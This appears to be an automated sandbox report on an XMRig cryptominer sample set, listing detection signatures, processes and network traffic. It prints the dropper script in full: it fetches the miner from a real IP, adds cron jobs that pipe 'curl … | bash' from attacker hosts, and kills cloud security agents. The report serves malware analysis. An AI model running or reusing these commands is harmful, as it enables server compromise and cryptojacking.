Malware Analysis Report

2025-01-02 07:09

Sample ID 241202-dcyx7s1lfk
Target hoze样本.zip
SHA256 747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7
Tags
defense_evasion discovery xmrig_linux miner antivm xmrig credential_access execution persistence privilege_escalatio privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Threat Level: Known bad

The file hoze样本.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery xmrig_linux miner antivm xmrig credential_access execution persistence privilege_escalatio privilege_escalation

Xmrig family

xmrig

Xmrig_linux family

XMRig Miner payload

Modifies password files for system users/ groups

Adds new SSH keys

OS Credential Dumping

File and Directory Permissions Modification

Write file to user bin folder

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Creates/modifies Cron job

Checks mountinfo of local process

Deletes log files

Attempts to change immutable files

Reads hardware information

Checks hardware identifiers (DMI)

Enumerates running processes

Reads process memory

Changes its process name

Checks CPU configuration

Reads CPU attributes

Enumerates physical storage devices

Reads runtime system information

System Location Discovery: System Language Discovery

Enumerates kernel/hardware configuration

System Network Configuration Discovery

Software Deployment Tools

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-02 02:52

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral27

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

133s

Max time network

145s

Command Line

[/tmp/xrx/secure]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/2290/ctty /usr/bin/pgrep N/A
File opened for reading /proc/17/stat /usr/bin/pgrep N/A
File opened for reading /proc/32/stat /usr/bin/pgrep N/A
File opened for reading /proc/1930/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/18/ctty /usr/bin/pgrep N/A
File opened for reading /proc/190/stat /usr/bin/pgrep N/A
File opened for reading /proc/2/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/8/ctty /usr/bin/pgrep N/A
File opened for reading /proc/9/status /usr/bin/pgrep N/A
File opened for reading /proc/1959/status /usr/bin/pgrep N/A
File opened for reading /proc/2010/ctty /usr/bin/pgrep N/A
File opened for reading /proc/49/status /usr/bin/pgrep N/A
File opened for reading /proc/1823/stat /usr/bin/pgrep N/A
File opened for reading /proc/1930/ctty /usr/bin/pgrep N/A
File opened for reading /proc/38/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1883/status /usr/bin/pgrep N/A
File opened for reading /proc/2271/status /usr/bin/pgrep N/A
File opened for reading /proc/2520/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2/ctty /usr/bin/pgrep N/A
File opened for reading /proc/24/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/29/status /usr/bin/pgrep N/A
File opened for reading /proc/2216/ctty /usr/bin/pgrep N/A
File opened for reading /proc/386/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/821/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2216/status /usr/bin/pgrep N/A
File opened for reading /proc/124/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/136/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1731/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2002/stat /usr/bin/pgrep N/A
File opened for reading /proc/2319/stat /usr/bin/pgrep N/A
File opened for reading /proc/41/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/386/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1942/stat /usr/bin/pgrep N/A
File opened for reading /proc/1988/stat /usr/bin/pgrep N/A
File opened for reading /proc/2256/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2241/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2319/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/17/status /usr/bin/pgrep N/A
File opened for reading /proc/29/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/584/status /usr/bin/pgrep N/A
File opened for reading /proc/2150/stat /usr/bin/pgrep N/A
File opened for reading /proc/5/stat /usr/bin/pgrep N/A
File opened for reading /proc/56/stat /usr/bin/pgrep N/A
File opened for reading /proc/1985/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/42/stat /usr/bin/pgrep N/A
File opened for reading /proc/44/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/46/stat /usr/bin/pgrep N/A
File opened for reading /proc/2250/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2301/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1063/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2002/status /usr/bin/pgrep N/A
File opened for reading /proc/2165/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/56/ctty /usr/bin/pgrep N/A
File opened for reading /proc/511/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1985/stat /usr/bin/pgrep N/A
File opened for reading /proc/12/ctty /usr/bin/pgrep N/A
File opened for reading /proc/18/status /usr/bin/pgrep N/A
File opened for reading /proc/817/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/190/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1122/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1711/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/3/ctty /usr/bin/pgrep N/A
File opened for reading /proc/30/ctty /usr/bin/pgrep N/A
File opened for reading /proc/35/cgroup /usr/bin/pgrep N/A

Processes

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c exec '/tmp/xrx/secure' "$@" /tmp/xrx/secure]

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/xrx/secure]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/xrx/init.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1166/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1187/stat /usr/bin/pidof N/A
File opened for reading /proc/74/cmdline /usr/bin/pidof N/A
File opened for reading /proc/110/cmdline /usr/bin/pidof N/A
File opened for reading /proc/843/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1042/stat /usr/bin/pidof N/A
File opened for reading /proc/1090/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1092/stat /usr/bin/pidof N/A
File opened for reading /proc/1494/stat /usr/bin/pidof N/A
File opened for reading /proc/1583/stat /usr/bin/pidof N/A
File opened for reading /proc/415/stat /usr/bin/pidof N/A
File opened for reading /proc/510/stat /usr/bin/pidof N/A
File opened for reading /proc/1078/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1442/stat /usr/bin/pidof N/A
File opened for reading /proc/427/stat /usr/bin/pidof N/A
File opened for reading /proc/1455/stat /usr/bin/pidof N/A
File opened for reading /proc/1494/cmdline /usr/bin/pidof N/A
File opened for reading /proc/4/stat /usr/bin/pidof N/A
File opened for reading /proc/119/stat /usr/bin/pidof N/A
File opened for reading /proc/197/cmdline /usr/bin/pidof N/A
File opened for reading /proc/198/stat /usr/bin/pidof N/A
File opened for reading /proc/783/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1392/stat /usr/bin/pidof N/A
File opened for reading /proc/1319/stat /usr/bin/pidof N/A
File opened for reading /proc/1347/stat /usr/bin/pidof N/A
File opened for reading /proc/27/cmdline /usr/bin/pidof N/A
File opened for reading /proc/83/stat /usr/bin/pidof N/A
File opened for reading /proc/212/stat /usr/bin/pidof N/A
File opened for reading /proc/412/stat /usr/bin/pidof N/A
File opened for reading /proc/776/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1088/stat /usr/bin/pidof N/A
File opened for reading /proc/92/cmdline /usr/bin/pidof N/A
File opened for reading /proc/197/stat /usr/bin/pidof N/A
File opened for reading /proc/1160/stat /usr/bin/pidof N/A
File opened for reading /proc/1165/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1363/stat /usr/bin/pidof N/A
File opened for reading /proc/1135/cmdline /usr/bin/pidof N/A
File opened for reading /proc/4/cmdline /usr/bin/pidof N/A
File opened for reading /proc/90/cmdline /usr/bin/pidof N/A
File opened for reading /proc/95/stat /usr/bin/pidof N/A
File opened for reading /proc/586/stat /usr/bin/pidof N/A
File opened for reading /proc/594/stat /usr/bin/pidof N/A
File opened for reading /proc/676/cmdline /usr/bin/pidof N/A
File opened for reading /proc/634/stat /usr/bin/pidof N/A
File opened for reading /proc/635/stat /usr/bin/pidof N/A
File opened for reading /proc/23/stat /usr/bin/pidof N/A
File opened for reading /proc/78/cmdline /usr/bin/pidof N/A
File opened for reading /proc/91/cmdline /usr/bin/pidof N/A
File opened for reading /proc/96/cmdline /usr/bin/pidof N/A
File opened for reading /proc/102/stat /usr/bin/pidof N/A
File opened for reading /proc/206/cmdline /usr/bin/pidof N/A
File opened for reading /proc/676/stat /usr/bin/pidof N/A
File opened for reading /proc/963/stat /usr/bin/pidof N/A
File opened for reading /proc/1183/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1244/cmdline /usr/bin/pidof N/A
File opened for reading /proc/11/cmdline /usr/bin/pidof N/A
File opened for reading /proc/314/stat /usr/bin/pidof N/A
File opened for reading /proc/415/cmdline /usr/bin/pidof N/A
File opened for reading /proc/637/stat /usr/bin/pidof N/A
File opened for reading /proc/1322/cmdline /usr/bin/pidof N/A
File opened for reading /proc/79/cmdline /usr/bin/pidof N/A
File opened for reading /proc/195/stat /usr/bin/pidof N/A
File opened for reading /proc/1101/stat /usr/bin/pidof N/A
File opened for reading /proc/1162/cmdline /usr/bin/pidof N/A

Processes

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c exec '/tmp/xrx/init.sh' "$@" /tmp/xrx/init.sh]

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/xrx/init.sh]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/cat

[cat config.json]

/usr/bin/pidof

[pidof xrx]

/tmp/xrx/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

Processes

/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win7-20241023-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

148s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/736/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/388/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/244/stat /usr/bin/killall N/A
File opened for reading /proc/714/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/714/cmdline /usr/bin/killall N/A
File opened for reading /proc/678/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/391/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/69/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/695/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/695/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/695/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/316/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/598/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/653/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/314/stat /usr/bin/killall N/A
File opened for reading /proc/229/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/112/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/143/cmdline /usr/bin/killall N/A
File opened for reading /proc/653/stat /usr/bin/killall N/A
File opened for reading /proc/143/stat /usr/bin/killall N/A
File opened for reading /proc/659/stat /usr/bin/killall N/A
File opened for reading /proc/279/stat /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/659/cmdline /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/598/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/601/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/155/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/654/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/113/stat /usr/bin/killall N/A
File opened for reading /proc/643/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/279/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/143/stat /usr/bin/killall N/A
File opened for reading /proc/603/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

140s

Command Line

[/tmp/xrx/xrx]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xrx/xrx N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xrx/xrx N/A
